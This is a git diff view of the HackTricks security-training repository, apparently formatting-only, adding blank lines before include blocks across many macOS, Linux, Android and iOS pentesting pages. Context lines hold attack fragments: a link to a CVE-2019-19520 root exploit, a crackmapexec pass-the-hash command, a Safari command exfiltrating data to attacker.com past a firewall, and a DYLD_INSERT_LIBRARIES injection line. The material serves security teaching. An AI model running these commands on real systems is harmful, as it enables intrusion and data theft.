These permissions may be abused with the following exploit to **escalate privileges** to root: [https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2019-19520/openbsd-authroot](https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2019-19520/openbsd-authroot)
{{#include ../../../banners/hacktricks-training.md}}

4
src/linux-hardening/privilege-escalation/linux-active-directory.md
View File

@ -14,6 +14,7 @@ If you have access over an AD in linux (or bash in Windows) you can try [https:/
You can also check the following page to learn **other ways to enumerate AD from linux**:
{{#ref}}
../../network-services-pentesting/pentesting-ldap.md
{{#endref}}
@ -22,6 +23,7 @@ You can also check the following page to learn **other ways to enumerate AD from
FreeIPA is an open-source **alternative** to Microsoft Windows **Active Directory**, mainly for **Unix** environments. It combines a complete **LDAP directory** with an MIT **Kerberos** Key Distribution Center for management akin to Active Directory. Utilizing the Dogtag **Certificate System** for CA & RA certificate management, it supports **multi-factor** authentication, including smartcards. SSSD is integrated for Unix authentication processes. Learn more about it in:
{{#ref}}
../freeipa-pentesting.md
{{#endref}}
@ -32,6 +34,7 @@ FreeIPA is an open-source **alternative** to Microsoft Windows **Active Director
In this page you are going to find different places were you could **find kerberos tickets inside a linux host**, in the following page you can learn how to transform this CCache tickets formats to Kirbi (the format you need to use in Windows) and also how to perform a PTT attack:
{{#ref}}
../../windows-hardening/active-directory-methodology/pass-the-ticket.md
{{#endref}}
@ -126,4 +129,3 @@ crackmapexec 10.XXX.XXX.XXX -u 'ServiceAccount$' -H "HashPlaceholder" -d "YourDO
{{#include ../../banners/hacktricks-training.md}}

2
src/linux-hardening/privilege-escalation/linux-capabilities.md
View File

@ -1413,6 +1413,7 @@ kill -s SIGUSR1 <nodejs-ps>
# After an URL to access the debugger will appear. e.g. ws://127.0.0.1:9229/45ea962a-29dd-4cdd-be08-a6827840553d
```
{{#ref}}
electron-cef-chromium-debugger-abuse.md
{{#endref}}
@ -1676,4 +1677,3 @@ In summary, `CAP_SETPCAP` allows a process to modify the capability sets of othe
{{#include ../../banners/hacktricks-training.md}}

2
src/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md
View File

@ -15,6 +15,7 @@ In the **/etc/exports** file, if you find some directory that is configured as *
For more information about **NFS** check:
{{#ref}}
../../network-services-pentesting/nfs-service-pentesting.md
{{#endref}}
@ -143,4 +144,3 @@ drwxr-x--- 6 1008 1009 1024 Apr 5 2017 9.3_old
{{#include ../../banners/hacktricks-training.md}}

2
src/linux-hardening/privilege-escalation/runc-privilege-escalation.md
View File

@ -6,6 +6,7 @@
If you want to learn more about **runc** check the following page:
{{#ref}}
../../network-services-pentesting/2375-pentesting-docker.md
{{#endref}}
@ -44,4 +45,3 @@ runc run demo
{{#include ../../banners/hacktricks-training.md}}

7
src/macos-hardening/macos-red-teaming/README.md
View File

@ -12,6 +12,7 @@ If you manage to **compromise admin credentials** to access the management platf
For red teaming in MacOS environments it's highly recommended to have some understanding of how the MDMs work:
{{#ref}}
macos-mdm/
{{#endref}}
@ -99,6 +100,7 @@ The script [**JamfExplorer.py**](https://github.com/WithSecureLabs/Jamf-Attack-T
And also about **MacOS** "special" **network** **protocols**:
{{#ref}}
../macos-security-and-privilege-escalation/macos-protocols.md
{{#endref}}
@ -107,14 +109,17 @@ And also about **MacOS** "special" **network** **protocols**:
In some occasions you will find that the **MacOS computer is connected to an AD**. In this scenario you should try to **enumerate** the active directory as you are use to it. Find some **help** in the following pages:
{{#ref}}
../../network-services-pentesting/pentesting-ldap.md
{{#endref}}
{{#ref}}
../../windows-hardening/active-directory-methodology/
{{#endref}}
{{#ref}}
../../network-services-pentesting/pentesting-kerberos-88/
{{#endref}}
@ -223,6 +228,7 @@ mount -t smbfs //server/folder /local/mount/point
The Keychain highly probably contains sensitive information that if accessed without generating a prompt could help to move forward a red team exercise:
{{#ref}}
macos-keychain.md
{{#endref}}
@ -251,4 +257,3 @@ When a file is downloaded in Safari, if its a "safe" file, it will be **automati
{{#include ../../banners/hacktricks-training.md}}

3
src/macos-hardening/macos-red-teaming/macos-mdm/README.md
View File

@ -77,6 +77,7 @@ It's crucial to note that the ease of enrollment provided by DEP, while benefici
Apple devices manufactured after 2010 generally have **12-character alphanumeric** serial numbers, with the **first three digits representing the manufacturing location**, the following **two** indicating the **year** and **week** of manufacture, the next **three** digits providing a **unique** **identifier**, and the **last** **four** digits representing the **model number**.
{{#ref}}
macos-serial-number.md
{{#endref}}
@ -196,6 +197,7 @@ Typically, **activation profile** provided by an MDM vendor will **include the f
As previously commented, in order to try to enrol a device into an organization **only a Serial Number belonging to that Organization is needed**. Once the device is enrolled, several organizations will install sensitive data on the new device: certificates, applications, WiFi passwords, VPN configurations [and so on](https://developer.apple.com/enterprise/documentation/Configuration-Profile-Reference.pdf).\
Therefore, this could be a dangerous entrypoint for attackers if the enrolment process isn't correctly protected:
{{#ref}}
enrolling-devices-in-other-organisations.md
{{#endref}}
@ -203,4 +205,3 @@ enrolling-devices-in-other-organisations.md
{{#include ../../../banners/hacktricks-training.md}}

12
src/macos-hardening/macos-security-and-privilege-escalation/README.md
View File

@ -8,30 +8,35 @@ If you are not familiar with macOS, you should start learning the basics of macO
- Special macOS **files & permissions:**
{{#ref}}
macos-files-folders-and-binaries/
{{#endref}}
- Common macOS **users**
{{#ref}}
macos-users.md
{{#endref}}
- **AppleFS**
{{#ref}}
macos-applefs.md
{{#endref}}
- The **architecture** of the k**ernel**
{{#ref}}
mac-os-architecture/
{{#endref}}
- Common macOS n**etwork services & protocols**
{{#ref}}
macos-protocols.md
{{#endref}}
@ -43,18 +48,21 @@ macos-protocols.md
In companies **macOS** systems are highly probably going to be **managed with a MDM**. Therefore, from the perspective of an attacker is interesting to know **how that works**:
{{#ref}}
../macos-red-teaming/macos-mdm/
{{#endref}}
### MacOS - Inspecting, Debugging and Fuzzing
{{#ref}}
macos-apps-inspecting-debugging-and-fuzzing/
{{#endref}}
## MacOS Security Protections
{{#ref}}
macos-security-protections/
{{#endref}}
@ -75,6 +83,7 @@ Being able to **create a file** that is going to be **used by root**, allows a u
For this kind of vulnerabilities don't forget to **check vulnerable `.pkg` installers**:
{{#ref}}
macos-files-folders-and-binaries/macos-installers-abuse.md
{{#endref}}
@ -83,6 +92,7 @@ macos-files-folders-and-binaries/macos-installers-abuse.md
Weird apps registered by file extensions could be abused and different applications can be register to open specific protocols
{{#ref}}
macos-file-extension-apps.md
{{#endref}}
@ -101,6 +111,7 @@ Follow these links to find different was to [**escalate privileges in TCC**](mac
Of course from a red teams perspective you should be also interested in escalating to root. Check the following post for some hints:
{{#ref}}
macos-privilege-escalation.md
{{#endref}}
@ -120,4 +131,3 @@ macos-privilege-escalation.md
{{#include ../../banners/hacktricks-training.md}}

5
src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/README.md
View File

@ -35,12 +35,14 @@ Moreover, **Mach and BSD each maintain different security models**: **Mach's** s
The I/O Kit is an open-source, object-oriented **device-driver framework** in the XNU kernel, handles **dynamically loaded device drivers**. It allows modular code to be added to the kernel on-the-fly, supporting diverse hardware.
{{#ref}}
macos-iokit.md
{{#endref}}
### IPC - Inter Process Communication
{{#ref}}
../macos-proces-abuse/macos-ipc-inter-process-communication/
{{#endref}}
@ -51,6 +53,7 @@ macOS is **super restrictive to load Kernel Extensions** (.kext) because of the
In the following page you can also see how to recover the `.kext` that macOS loads inside its **kernelcache**:
{{#ref}}
macos-kernel-extensions.md
{{#endref}}
@ -59,6 +62,7 @@ macos-kernel-extensions.md
Instead of using Kernel Extensions macOS created the System Extensions, which offers in user level APIs to interact with the kernel. This way, developers can avoid to use kernel extensions.
{{#ref}}
macos-system-extensions.md
{{#endref}}
@ -71,4 +75,3 @@ macos-system-extensions.md
{{#include ../../../banners/hacktricks-training.md}}

6
src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/README.md
View File

@ -250,6 +250,7 @@ int main() {
You can grab a shellcode from:
{{#ref}}
../../macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md
{{#endref}}
@ -524,6 +525,7 @@ Therefore, to **improve the thread** it should call **`pthread_create_from_mach_
You can find **example dylibs** in (for example the one that generates a log and then you can listen to it):
{{#ref}}
../../macos-dyld-hijacking-and-dyld_insert_libraries.md
{{#endref}}
@ -814,6 +816,7 @@ gcc -framework Foundation -framework Appkit dylib_injector.m -o dylib_injector
In this technique a thread of the process is hijacked:
{{#ref}}
../../macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.md
{{#endref}}
@ -826,6 +829,7 @@ XPC, which stands for XNU (the kernel used by macOS) inter-Process Communication
For more information about how this **communication work** on how it **could be vulnerable** check:
{{#ref}}
../../macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/
{{#endref}}
@ -836,6 +840,7 @@ MIG was created to **simplify the process of Mach IPC** code creation. It basica
For more info check:
{{#ref}}
../../macos-proces-abuse/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.md
{{#endref}}
@ -851,4 +856,3 @@ For more info check:
{{#include ../../../../banners/hacktricks-training.md}}

3
src/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/README.md
View File

@ -138,6 +138,7 @@ The params this function expects are:
See how to **get this info easily with `lldb` in ARM64** in this page:
{{#ref}}
arm64-basic-assembly.md
{{#endref}}
@ -557,6 +558,7 @@ sudo launchctl load -w /System/Library/LaunchDaemons/ssh.plist
**Checkout the following page** to find out how you can find which app is responsible of **handling the specified scheme or protocol:**
{{#ref}}
../macos-file-extension-apps.md
{{#endref}}
@ -635,4 +637,3 @@ litefuzz -s -a tcp://localhost:5900 -i input/screenshared-session --reportcrash
{{#include ../../../banners/hacktricks-training.md}}

1
src/macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md
View File

@ -75,6 +75,7 @@ open -j -a Safari "https://attacker.com?data=data%20to%20exfil"
If you can **inject code into a process** that is allowed to connect to any server you could bypass the firewall protections:
{{#ref}}
macos-proces-abuse/
{{#endref}}

6
src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/README.md
View File

@ -35,12 +35,14 @@
MacOS stores information such as passwords in several places:
{{#ref}}
macos-sensitive-locations.md
{{#endref}}
### Vulnerable pkg installers
{{#ref}}
macos-installers-abuse.md
{{#endref}}
@ -69,6 +71,7 @@ macos-installers-abuse.md
A bundle is a **directory** which **looks like an object in Finder** (a Bundle example are `*.app` files).
{{#ref}}
macos-bundles.md
{{#endref}}
@ -235,6 +238,7 @@ The tool afscexpand can be used to force decompress a dile.
Mac OS binaries usually are compiled as **universal binaries**. A **universal binary** can **support multiple architectures in the same file**.
{{#ref}}
universal-binaries-and-mach-o-format.md
{{#endref}}
@ -243,6 +247,7 @@ universal-binaries-and-mach-o-format.md
## macOS memory dumping
{{#ref}}
macos-memory-dumping.md
{{#endref}}
@ -270,4 +275,3 @@ The directory `/System/Library/CoreServices/CoreTypes.bundle/Contents/Resources/
{{#include ../../../banners/hacktricks-training.md}}

4
src/macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.md
View File

@ -6,6 +6,7 @@
If you came here looking for TCC privilege escalation go to:
{{#ref}}
macos-security-protections/macos-tcc/
{{#endref}}
@ -14,6 +15,7 @@ macos-security-protections/macos-tcc/
Please note that **most of the tricks about privilege escalation affecting Linux/Unix will affect also MacOS** machines. So see:
{{#ref}}
../../linux-hardening/privilege-escalation/
{{#endref}}
@ -240,6 +242,7 @@ A more detailed explanation can be [**found in the original report**](https://th
This can be useful to escalate privileges:
{{#ref}}
macos-files-folders-and-binaries/macos-sensitive-locations.md
{{#endref}}
@ -247,4 +250,3 @@ macos-files-folders-and-binaries/macos-sensitive-locations.md
{{#include ../../banners/hacktricks-training.md}}

11
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/README.md
View File

@ -151,6 +151,7 @@ MacOS, like any other operating system, provides a variety of methods and mechan
Library Injection is a technique wherein an attacker **forces a process to load a malicious library**. Once injected, the library runs in the context of the target process, providing the attacker with the same permissions and access as the process.
{{#ref}}
macos-library-injection/
{{#endref}}
@ -159,6 +160,7 @@ macos-library-injection/
Function Hooking involves **intercepting function calls** or messages within a software code. By hooking functions, an attacker can **modify the behavior** of a process, observe sensitive data, or even gain control over the execution flow.
{{#ref}}
macos-function-hooking.md
{{#endref}}
@ -167,6 +169,7 @@ macos-function-hooking.md
Inter Process Communication (IPC) refers to different methods by which separate processes **share and exchange data**. While IPC is fundamental for many legitimate applications, it can also be misused to subvert process isolation, leak sensitive information, or perform unauthorized actions.
{{#ref}}
macos-ipc-inter-process-communication/
{{#endref}}
@ -175,6 +178,7 @@ macos-ipc-inter-process-communication/
Electron applications executed with specific env variables could be vulnerable to process injection:
{{#ref}}
macos-electron-applications-injection.md
{{#endref}}
@ -183,6 +187,7 @@ macos-electron-applications-injection.md
It's possible to use the flags `--load-extension` and `--use-fake-ui-for-media-stream` to perform a **man in the browser attack** allowing to steal keystrokes, traffic, cookies, inject scripts in pages...:
{{#ref}}
macos-chromium-injection.md
{{#endref}}
@ -191,6 +196,7 @@ macos-chromium-injection.md
NIB files **define user interface (UI) elements** and their interactions within an application. However, they can **execute arbitrary commands** and **Gatekeeper doesn't stop** an already executed application from being executed if a **NIB file is modified**. Therefore, they could be used to make arbitrary programs execute arbitrary commands:
{{#ref}}
macos-dirty-nib.md
{{#endref}}
@ -199,6 +205,7 @@ macos-dirty-nib.md
It's possible to abuse certain java capabilities (like the **`_JAVA_OPTS`** env variable) to make a java application execute **arbitrary code/commands**.
{{#ref}}
macos-java-apps-injection.md
{{#endref}}
@ -207,6 +214,7 @@ macos-java-apps-injection.md
It's possible to inject code into .Net applications by **abusing the .Net debugging functionality** (not protected by macOS protections such as runtime hardening).
{{#ref}}
macos-.net-applications-injection.md
{{#endref}}
@ -215,6 +223,7 @@ macos-.net-applications-injection.md
Check different options to make a Perl script execute arbitrary code in:
{{#ref}}
macos-perl-applications-injection.md
{{#endref}}
@ -223,6 +232,7 @@ macos-perl-applications-injection.md
I't also possible to abuse ruby env variables to make arbitrary scripts execute arbitrary code:
{{#ref}}
macos-ruby-applications-injection.md
{{#endref}}
@ -276,4 +286,3 @@ Note that to call that function you need to be **the same uid** as the one runni
{{#include ../../../banners/hacktricks-training.md}}

6
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/README.md
View File

@ -534,6 +534,7 @@ Any thread can get this port calling to **`mach_thread_sef`**.
You can grab a shellcode from:
{{#ref}}
../../macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md
{{#endref}}
@ -814,6 +815,7 @@ Therefore, to **improve the thread** it should call **`pthread_create_from_mach_
You can find **example dylibs** in (for example the one that generates a log and then you can listen to it):
{{#ref}}
../macos-library-injection/macos-dyld-hijacking-and-dyld_insert_libraries.md
{{#endref}}
@ -1104,6 +1106,7 @@ gcc -framework Foundation -framework Appkit dylib_injector.m -o dylib_injector
In this technique a thread of the process is hijacked:
{{#ref}}
macos-thread-injection-via-task-port.md
{{#endref}}
@ -1258,6 +1261,7 @@ XPC, which stands for XNU (the kernel used by macOS) inter-Process Communication
For more information about how this **communication work** on how it **could be vulnerable** check:
{{#ref}}
macos-xpc/
{{#endref}}
@ -1270,6 +1274,7 @@ MIC basically **generates the needed code** for server and client to communicate
For more info check:
{{#ref}}
macos-mig-mach-interface-generator.md
{{#endref}}
@ -1287,4 +1292,3 @@ macos-mig-mach-interface-generator.md
{{#include ../../../../banners/hacktricks-training.md}}

3
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/README.md
View File

@ -126,6 +126,7 @@ Applications can **subscribe** to different event **messages**, enabling them to
When a process tries to call a method from via an XPC connection, the **XPC service should check if that process is allowed to connect**. Here are the common ways to check that and the common pitfalls:
{{#ref}}
macos-xpc-connecting-process-check/
{{#endref}}
@ -134,6 +135,7 @@ macos-xpc-connecting-process-check/
Apple also allows apps to **configure some rights and how to get them** so if the calling process have them it would be **allowed to call a method** from the XPC service:
{{#ref}}
macos-xpc-authorization.md
{{#endref}}
@ -486,4 +488,3 @@ It's possible to find thee communications using `netstat`, `nettop` or the open
{{#include ../../../../../banners/hacktricks-training.md}}

2
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.md
View File

@ -31,6 +31,7 @@ An example could be found in [EvenBetterAuthorizationSample](https://github.com/
For more information about how to properly configure this check:
{{#ref}}
macos-xpc-connecting-process-check/
{{#endref}}
@ -442,4 +443,3 @@ int main(void) {
{{#include ../../../../../banners/hacktricks-training.md}}

3
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/README.md
View File

@ -26,12 +26,14 @@ When a connection is stablished to an XPC service, the server will check if the
For more information about the PID reuse attack check:
{{#ref}}
macos-pid-reuse.md
{{#endref}}
For more information **`xpc_connection_get_audit_token`** attack check:
{{#ref}}
macos-xpc_connection_get_audit_token-attack.md
{{#endref}}
@ -95,4 +97,3 @@ if ((csFlags & (cs_hard | cs_require_lv)) {
{{#include ../../../../../../banners/hacktricks-training.md}}

3
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc_connection_get_audit_token-attack.md
View File

@ -8,6 +8,7 @@
If you don't know what Mach Messages are start checking this page:
{{#ref}}
../../
{{#endref}}
@ -19,6 +20,7 @@ Mach messages are sent over a _mach port_, which is a **single receiver, multipl
If you don't know how a XPC connection is established check:
{{#ref}}
../
{{#endref}}
@ -125,4 +127,3 @@ Below is a visual representation of the described attack scenario:
{{#include ../../../../../../banners/hacktricks-training.md}}

4
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/README.md
View File

@ -9,6 +9,7 @@
Take a look on how Dyld loads libraries inside binaries in:
{{#ref}}
macos-dyld-process.md
{{#endref}}
@ -50,6 +51,7 @@ You can also load a library if it's **signed with the same certificate as the bi
Find a example on how to (ab)use this and check the restrictions in:
{{#ref}}
macos-dyld-hijacking-and-dyld_insert_libraries.md
{{#endref}}
@ -108,6 +110,7 @@ The way to **escalate privileges** abusing this functionality would be in the ra
**Example**
{{#ref}}
macos-dyld-hijacking-and-dyld_insert_libraries.md
{{#endref}}
@ -339,4 +342,3 @@ DYLD_INSERT_LIBRARIES=inject.dylib ./hello-signed # Won't work
{{#include ../../../../banners/hacktricks-training.md}}

2
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-process.md
View File

@ -19,6 +19,7 @@ Dyld will be loaded by **`dyldboostrap::start`**, which will also load things su
**`dyls::_main()`** is the entry point of dyld and it's first task is to run `configureProcessRestrictions()`, which usually restricts **`DYLD_*`** environment variables explained in:
{{#ref}}
./
{{#endref}}
@ -316,4 +317,3 @@ find . -type f | xargs grep strcmp| grep key,\ \" | cut -d'"' -f2 | sort -u
{{#include ../../../../banners/hacktricks-training.md}}

6
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/README.md
View File

@ -8,6 +8,7 @@ Gatekeeper is usually used to refer to the combination of **Quarantine + Gatekee
More information in:
{{#ref}}
macos-gatekeeper.md
{{#endref}}
@ -18,6 +19,7 @@ macos-gatekeeper.md
### SIP - System Integrity Protection
{{#ref}}
macos-sip.md
{{#endref}}
@ -26,6 +28,7 @@ macos-sip.md
MacOS Sandbox **limits applications** running inside the sandbox to the **allowed actions specified in the Sandbox profile** the app is running with. This helps to ensure that **the application will be accessing only expected resources**.
{{#ref}}
macos-sandbox/
{{#endref}}
@ -34,6 +37,7 @@ macos-sandbox/
**TCC (Transparency, Consent, and Control)** is a security framework. It's designed to **manage the permissions** of applications, specifically by regulating their access to sensitive features. This includes elements like **location services, contacts, photos, microphone, camera, accessibility, and full disk access**. TCC ensures that apps can only access these features after obtaining explicit user consent, thereby bolstering privacy and control over personal data.
{{#ref}}
macos-tcc/
{{#endref}}
@ -42,6 +46,7 @@ macos-tcc/
Launch constraints in macOS are a security feature to **regulate process initiation** by defining **who can launch** a process, **how**, and **from where**. Introduced in macOS Ventura, they categorize system binaries into constraint categories within a **trust cache**. Every executable binary has set **rules** for its **launch**, including **self**, **parent**, and **responsible** constraints. Extended to third-party apps as **Environment** Constraints in macOS Sonoma, these features help mitigate potential system exploitations by governing process launching conditions.
{{#ref}}
macos-launch-environment-constraints.md
{{#endref}}
@ -145,4 +150,3 @@ References and **more information about BTM**:
{{#include ../../../banners/hacktricks-training.md}}

2
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/README.md
View File

@ -160,6 +160,7 @@ ls -le test
Not really needed but I leave it there just in case:
{{#ref}}
macos-xattr-acls-extra-stuff.md
{{#endref}}
@ -469,4 +470,3 @@ This feature is particularly useful for preventing certain classes of security v
{{#include ../../../../banners/hacktricks-training.md}}

2
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/README.md
View File

@ -287,6 +287,7 @@ On macOS, unlike iOS where processes are sandboxed from the start by the kernel,
Processes are automatically Sandboxed from userland when they start if they have the entitlement: `com.apple.security.app-sandbox`. For a detailed explanation of this process check:
{{#ref}}
macos-sandbox-debug-and-bypass/
{{#endref}}
@ -401,4 +402,3 @@ Sandbox also has a user daemon running exposing the XPC Mach service `com.apple.
{{#include ../../../../banners/hacktricks-training.md}}

5
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md
View File

@ -30,6 +30,7 @@ This is what was done in [**CVE-2023-32364**](https://gergelykalman.com/CVE-2023
In the [**last examples of Word sandbox bypass**](macos-office-sandbox-bypasses.md#word-sandbox-bypass-via-login-items-and-.zshenv) can be appreciated how the **`open`** cli functionality could be abused to bypass the sandbox.
{{#ref}}
macos-office-sandbox-bypasses.md
{{#endref}}
@ -47,6 +48,7 @@ For this you might even need **2 steps**: To make a process with a **more permis
Check this page about **Auto Start locations**:
{{#ref}}
../../../../macos-auto-start-locations.md
{{#endref}}
@ -55,6 +57,7 @@ Check this page about **Auto Start locations**:
If from then sandbox process you are able to **compromise other processes** running in less restrictive sandboxes (or none), you will be able to escape to their sandboxes:
{{#ref}}
../../../macos-proces-abuse/
{{#endref}}
@ -270,6 +273,7 @@ Note that even if some **actions** might be **allowed by at he sandbox** if an a
For more information about **Interposting** check:
{{#ref}}
../../../macos-proces-abuse/macos-function-hooking.md
{{#endref}}
@ -501,4 +505,3 @@ Process 2517 exited with status = 0 (0x00000000)
{{#include ../../../../../banners/hacktricks-training.md}}

4
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/README.md
View File

@ -330,6 +330,7 @@ INSERT INTO access (
If you managed to get inside an app with some TCC permissions check the following page with TCC payloads to abuse them:
{{#ref}}
macos-tcc-payloads.md
{{#endref}}
@ -338,6 +339,7 @@ macos-tcc-payloads.md
Learn about Apple Events in:
{{#ref}}
macos-apple-events.md
{{#endref}}
@ -590,6 +592,7 @@ AllowApplicationsList.plist:
### TCC Bypasses
{{#ref}}
macos-tcc-bypasses/
{{#endref}}
@ -604,4 +607,3 @@ macos-tcc-bypasses/
{{#include ../../../../banners/hacktricks-training.md}}

5
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/README.md
View File

@ -35,6 +35,7 @@ Moreover, it's possible to **remove the legit app from the Dock and put the fake
More info and PoC in:
{{#ref}}
../../../macos-privilege-escalation.md
{{#endref}}
@ -72,6 +73,7 @@ An app with the **`kTCCServiceAppleEvents`** permission will be able to **contro
For more info about Apple Scripts check:
{{#ref}}
macos-apple-scripts.md
{{#endref}}
@ -262,6 +264,7 @@ For more info check the [**original report**](https://www.microsoft.com/en-us/se
There are different techniques to inject code inside a process and abuse its TCC privileges:
{{#ref}}
../../../macos-proces-abuse/
{{#endref}}
@ -508,6 +511,7 @@ The folder **`/var/db/locationd/` wasn't protected from DMG mounting** so it was
## By startup apps
{{#ref}}
../../../../macos-auto-start-locations.md
{{#endref}}
@ -537,4 +541,3 @@ Another way using [**CoreGraphics events**](https://objectivebythesea.org/v2/tal
{{#include ../../../../../banners/hacktricks-training.md}}

11
src/mobile-pentesting/android-app-pentesting/README.md
View File

@ -6,6 +6,7 @@
It's highly recommended to start reading this page to know about the **most important parts related to Android security and the most dangerous components in an Android application**:
{{#ref}}
android-applications-basics.md
{{#endref}}
@ -54,10 +55,12 @@ java -jar uber-apk-signer.jar -a merged.apk --allowResign -o merged_signed
## Case Studies & Vulnerabilities
{{#ref}}
../ios-pentesting/air-keyboard-remote-input-injection.md
{{#endref}}
{{#ref}}
../../linux-hardening/privilege-escalation/android-rooting-frameworks-manager-auth-bypass-syscall-hook.md
{{#endref}}
@ -98,6 +101,7 @@ In effect, it is **blinding the user from knowing they are actually performing a
Find more information in:
{{#ref}}
tapjacking.md
{{#endref}}
@ -108,6 +112,7 @@ An **activity** with the **`launchMode`** set to **`singleTask` without any `tas
More info in:
{{#ref}}
android-task-hijacking.md
{{#endref}}
@ -182,6 +187,7 @@ Developers shouldn't use **deprecated algorithms** to perform authorisation **ch
Read the following page to learn how to easily access javascript code of React applications:
{{#ref}}
react-native-application.md
{{#endref}}
@ -190,6 +196,7 @@ react-native-application.md
Read the following page to learn how to easily access C# code of a xamarin applications:
{{#ref}}
../xamarin-apps.md
{{#endref}}
@ -210,6 +217,7 @@ An application may contain secrets (API keys, passwords, hidden urls, subdomains
### Bypass Biometric Authentication
{{#ref}}
bypass-biometric-authentication-android.md
{{#endref}}
@ -223,6 +231,7 @@ bypass-biometric-authentication-android.md
### **Other tricks**
{{#ref}}
content-protocol.md
{{#endref}}
@ -252,6 +261,7 @@ Thanks to the ADB connection you can use **Drozer** and **Frida** inside the emu
- [**Android Studio**](https://developer.android.com/studio) (You can create **x86** and **arm** devices, and according to [**this** ](https://android-developers.googleblog.com/2020/03/run-arm-apps-on-android-emulator.html)**latest x86** versions **support ARM libraries** without needing an slow arm emulator).
- Learn to set it up in this page:
{{#ref}}
avd-android-virtual-device.md
{{#endref}}
@ -792,4 +802,3 @@ AndroL4b is an Android security virtual machine based on ubuntu-mate includes th
{{#include ../../banners/hacktricks-training.md}}

2
src/mobile-pentesting/android-app-pentesting/avd-android-virtual-device.md
View File

@ -223,6 +223,7 @@ Using [rootAVD](https://github.com/newbit1/rootAVD) with [Magisk](https://github
Check the following page to learn how to install a custom CA cert:
{{#ref}}
install-burp-certificate.md
{{#endref}}
@ -238,4 +239,3 @@ You can **use the GUI** to take a snapshot of the VM at any time:
{{#include ../../banners/hacktricks-training.md}}

3
src/mobile-pentesting/android-app-pentesting/tapjacking.md
View File

@ -107,6 +107,7 @@ wm.addView(phishingView, lp);
For additional details on leveraging Accessibility Services for full remote device control (e.g. PlayPraetor, SpyNote, etc.) see:
{{#ref}}
accessibility-services-abuse.md
{{#endref}}
@ -114,4 +115,4 @@ accessibility-services-abuse.md
## References
* [Bitsight ToxicPanda Android Banking Malware 2025 Study](https://www.bitsight.com/blog/toxicpanda-android-banking-malware-2025-study)
{{#include ../../banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

16
src/mobile-pentesting/ios-pentesting/README.md
View File

@ -4,6 +4,7 @@
## iOS Basics
{{#ref}}
ios-basics.md
{{#endref}}
@ -12,6 +13,7 @@ ios-basics.md
In this page you can find information about the **iOS simulator**, **emulators** and **jailbreaking:**
{{#ref}}
ios-testing-environment.md
{{#endref}}
@ -22,6 +24,7 @@ ios-testing-environment.md
During the testing **several operations are going to be suggested** (connect to the device, read/write/upload/download files, use some tools...). Therefore, if you don't know how to perform any of these actions please, **start reading the page**:
{{#ref}}
basic-ios-testing-operations.md
{{#endref}}
@ -158,6 +161,7 @@ $ frida-ps -Uai
Learn how to **enumerate the components of the application** and how to easily **hook methods and classes** with objection:
{{#ref}}
ios-hooking-with-objection.md
{{#endref}}
@ -387,6 +391,7 @@ However, the best options to disassemble the binary are: [**Hopper**](https://ww
To learn about how iOS stores data in the device read this page:
{{#ref}}
ios-basics.md
{{#endref}}
@ -486,6 +491,7 @@ Developers are enabled to **store and sync data** within a **NoSQL cloud-hosted
You can find how to check for misconfigured Firebase databases here:
{{#ref}}
../../network-services-pentesting/pentesting-web/buckets/firebase-database.md
{{#endref}}
@ -1056,42 +1062,49 @@ frida -U -f com.highaltitudehacks.DVIAswiftv2 --no-pause -l fingerprint-bypass-i
### Custom URI Handlers / Deeplinks / Custom Schemes
{{#ref}}
ios-custom-uri-handlers-deeplinks-custom-schemes.md
{{#endref}}
### Universal Links
{{#ref}}
ios-universal-links.md
{{#endref}}
### UIActivity Sharing
{{#ref}}
ios-uiactivity-sharing.md
{{#endref}}
### UIPasteboard
{{#ref}}
ios-uipasteboard.md
{{#endref}}
### App Extensions
{{#ref}}
ios-app-extensions.md
{{#endref}}
### WebViews
{{#ref}}
ios-webviews.md
{{#endref}}
### Serialisation and Encoding
{{#ref}}
ios-serialisation-and-encoding.md
{{#endref}}
@ -1101,6 +1114,7 @@ ios-serialisation-and-encoding.md
It's important to check that no communication is occurring **without encryption** and also that the application is correctly **validating the TLS certificate** of the server.\
To check these kind of issues you can use a proxy like **Burp**:
{{#ref}}
burp-configuration-for-ios.md
{{#endref}}
@ -1150,6 +1164,7 @@ otool -L <application_path>
## Interesting Vulnerabilities & Case Studies
{{#ref}}
air-keyboard-remote-input-injection.md
{{#endref}}
@ -1185,4 +1200,3 @@ air-keyboard-remote-input-injection.md
{{#include ../../banners/hacktricks-training.md}}

Some files were not shown because too many files have changed in this diff Show More